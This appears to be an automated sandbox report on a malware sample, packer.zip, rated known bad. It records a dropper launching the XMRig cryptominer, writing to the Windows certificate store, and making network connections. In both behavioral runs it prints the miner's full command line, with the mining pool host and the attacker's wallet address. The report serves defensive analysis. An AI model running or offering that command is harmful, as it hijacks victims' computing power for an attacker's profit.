Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Executes dropped EXE
Unsigned PE
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 15:12
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4024 wrote to memory of 4164 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4024 wrote to memory of 4164 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4164-16-0x000001CE9FD50000-0x000001CE9FD70000-memory.dmp
memory/4164-17-0x000001CE9FDA0000-0x000001CE9FDC0000-memory.dmp
memory/4164-18-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-20-0x000001CE9FDE0000-0x000001CE9FE00000-memory.dmp
memory/4164-19-0x000001CE9FDC0000-0x000001CE9FDE0000-memory.dmp
memory/4164-21-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-22-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-25-0x000001CE9FDE0000-0x000001CE9FE00000-memory.dmp
memory/4164-24-0x000001CE9FDC0000-0x000001CE9FDE0000-memory.dmp
memory/4164-23-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-26-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-27-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-28-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-29-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-30-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-31-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-32-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-33-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-34-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-35-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-36-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-37-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-38-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-39-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-40-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-41-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-42-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-43-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-44-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-45-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-46-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-47-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-48-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-49-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-50-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-51-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-52-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-53-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-54-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-55-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-56-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-57-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-58-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-59-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-60-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-61-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-62-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-63-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-64-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-65-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-66-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-67-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-68-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-69-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-70-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-71-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-72-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-73-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-74-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-75-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-76-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-77-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-78-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-79-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-80-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-81-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-82-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-83-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
memory/4164-84-0x00007FF6C4EE0000-0x00007FF6C59E3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3508 wrote to memory of 2928 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3508 wrote to memory of 2928 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| NL | 23.62.61.106:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2928-16-0x000002118EC10000-0x000002118EC30000-memory.dmp
memory/2928-17-0x000002118EEA0000-0x000002118EEC0000-memory.dmp
memory/2928-18-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-20-0x0000021190680000-0x00000211906A0000-memory.dmp
memory/2928-19-0x00000211906A0000-0x00000211906C0000-memory.dmp
memory/2928-21-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-22-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-23-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-24-0x00000211906A0000-0x00000211906C0000-memory.dmp
memory/2928-25-0x0000021190680000-0x00000211906A0000-memory.dmp
memory/2928-26-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-27-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-28-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-29-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-30-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-31-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-32-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-33-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-34-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-35-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-36-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-37-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-38-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-39-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-40-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-41-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-42-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-43-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-44-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-45-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-46-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
memory/2928-47-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp
